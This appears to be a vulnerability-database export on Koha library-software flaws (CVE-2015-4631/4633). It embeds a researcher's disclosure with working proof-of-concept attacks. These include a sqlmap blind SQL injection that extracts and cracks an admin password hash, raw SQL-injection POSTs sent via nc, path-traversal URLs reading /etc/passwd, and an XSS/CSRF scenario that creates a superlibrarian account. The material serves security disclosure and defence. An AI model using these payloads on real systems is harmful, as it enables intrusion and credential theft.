"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008219"
},
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-696"
},
{
"db": "NVD",
"id": "CVE-2015-4631"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-12T00:00:00",
"db": "IVD",
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
},
{
"date": "2015-08-12T00:00:00",
"db": "IVD",
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
},
{
"date": "2015-08-12T00:00:00",
"db": "IVD",
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
},
{
"date": "2015-08-12T00:00:00",
"db": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
},
{
"date": "2015-08-12T00:00:00",
"db": "IVD",
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"date": "2015-06-25T00:00:00",
"db": "BID",
"id": "75426"
},
{
"date": "2019-01-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008219"
},
{
"date": "2015-06-26T23:02:22",
"db": "PACKETSTORM",
"id": "132458"
},
{
"date": "2015-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201512-696"
},
{
"date": "2018-10-18T21:29:00.723000",
"db": "NVD",
"id": "CVE-2015-4631"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"date": "2015-06-25T00:00:00",
"db": "BID",
"id": "75426"
},
{
"date": "2019-01-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008219"
},
{
"date": "2018-11-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201512-696"
},
{
"date": "2024-11-21T02:31:26.413000",
"db": "NVD",
"id": "CVE-2015-4631"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-696"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Koha Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-696"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting",
"sources": [
{
"db": "IVD",
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
}
],
"trust": 1.0
}
}
var-201810-0026
Vulnerability from variot
Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface. Koha In SQL An injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Koha is the first open source library automation system. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML Injection vulnerabilities 4. Multiple cross-site scripting vulnerabilities 5. Multiple cross site request forgery vulnerabilities An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. =============================================================================================== SBA Research Vulnerability Disclosure ===============================================================================================
title: Koha Unauthenticated SQL injection product: Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website: http://www.koha-community.org/
found by: Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact: cst@sba-research.org
References: http://koha-community.org/security-release-koha-3-20-1/ http://koha-community.org/security-release-koha-3-18-8/ http://koha-community.org/security-release-koha-3-16-12/
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
===============================================================================================
========================= 1. If the webserver is misconfigured, the file-system may be accessed as well.
References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
##################################################################################################
PoC:
##################################################################################################
- Inspect Koha database schema
Have a look at how to query the database for superlibrarian users: http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians
So basically we we need to execute some SQL statement like this: sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
- Query the database with sqlmap
So let's fire up sqlmap with the --sql-shell parameter and input the query:
root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4 _ ___ | | ___ ___ {1.0-dev-nongit-20150513} | -| . | | | .'| . | || |||||__,| | || || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:20:07
[09:20:07] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: number (GET) Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1) --- [09:20:09] [INFO] testing MySQL [09:20:09] [INFO] confirming MySQL [09:20:09] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.0 [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1' [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors admin [09:21:46] [INFO] retrieved: $2a$08$taQ [09:23:33] [ERROR] invalid character detected. retrying.. [09:23:33] [WARNING] increasing time delay to 5 seconds afOgEEhU [09:25:10] [ERROR] invalid character detected. retrying.. [09:25:10] [WARNING] increasing time delay to 6 seconds t/gW [09:26:13] [ERROR] invalid character detected. retrying.. [09:26:13] [WARNING] increasing time delay to 7 seconds TOmqnYe1Y6ZNxCENa [09:29:57] [ERROR] invalid character detected. retrying.. [09:29:57] [WARNING] increasing time delay to 8 seconds 2.ONk2eZhnuEw5z9OjjxS [09:35:08] [ERROR] invalid character detected. retrying.. [09:35:08] [WARNING] increasing time delay to 9 seconds
select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: 'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
- Feed john the ripper and be lucky
root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass root@kali:/home/wicked# john ./admin-pass Loaded 1 password hash (OpenBSD Blowfish [32/64 X2]) admin (?) guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate Use the "--show" option to display all of the cracked passwords reliably
root@kali:/home/wicked# john ./admin-pass --show ?:admin
1 password hash cracked, 0 left
- If the webserver is misconfigured, read & write access to the filesystem may be possible.
References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
##################################################################################################
PoC:
##################################################################################################
==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002
====================================================================
You will notice different output in every second request, demonstrating the evaluation of the payload.
##################################################################################################
PoC End
##################################################################################################
================================= 3. Path Traversal (CVE-2015-4633) =================================
Vulnerability
The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal.
References
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
##################################################################################################
PoC:
##################################################################################################
The following input is used to print out /etc/passwd:
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
##################################################################################################
PoC End
##################################################################################################
================================= 4. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks.
The attack can be performed by:
- through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)
- through a user clicking a malicious link (phishing mail, forum link etc.)
The following pages are affected from stored XSS flaws:
/cgi-bin/koha/opac-shelves.pl /cgi-bin/koha/virtualshelves/shelves.pl
The following pages are affected from relfective XSS flaws:
/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display") /cgi-bin/koha/opac-search.pl (parameters: "tag") /cgi-bin/koha/authorities/authorities-home.pl (parameters: "value") /cgi-bin/koha/acqui/lateorders.pl (parameters: "delay") /cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield") /cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield") /cgi-bin/koha/catalogue/search.pl (parameters: "limit") /cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") /cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")
Impact
The vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to:
- escalate privileges by targeting staff members with XSRF
- target users via browser exploits
- target the webserver by combining with other server-side vulnerabilities.
References
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
##################################################################################################
PoC / Attack Scenario:
##################################################################################################
Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:
--> http:///cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens
--> http:///cgi-bin/koha/virtualshelves/shelves.pl
the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:
Create new user:
--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
Give the new user superlibririan permission:
--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
The attacker can now log as superlibrarian.
Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists.
##################################################################################################
PoC / Attack Scenario End
##################################################################################################
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-0026",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "library software community koha",
"scope": null,
"trust": 3.0,
"vendor": "koha",
"version": null
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.18.08"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.16.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.20.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.20.01"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.16"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.16.12"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.18.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.20.x"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.16.x"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.16.12"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.14.16"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.14.x"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.20.1"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.18.x"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.18.08"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.05"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.06"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.00"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.03"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.04"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.01"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.14.02"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.20"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.18.7"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.18"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.16.11"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.16"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.20.1"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.18.8"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.16.12"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008221"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-698"
},
{
"db": "NVD",
"id": "CVE-2015-4633"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:koha:koha",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008221"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Raschin Ghanad-Tavakoli",
"sources": [
{
"db": "BID",
"id": "75426"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-698"
}
],
"trust": 0.9
},
"cve": "CVE-2015-4633",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2015-4633",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05198",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-05201",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-05199",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-05200",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05197",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2015-4633",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-4633",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2015-4633",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2015-05198",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05201",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05199",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05200",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05197",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201512-698",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008221"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-698"
},
{
"db": "NVD",
"id": "CVE-2015-4633"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface. Koha In SQL An injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Koha is the first open source library automation system. Koha is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. Multiple directory-traversal vulnerabilities\n3. Multiple HTML Injection vulnerabilities\n4. Multiple cross-site scripting vulnerabilities\n5. Multiple cross site request forgery vulnerabilities\nAn attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. 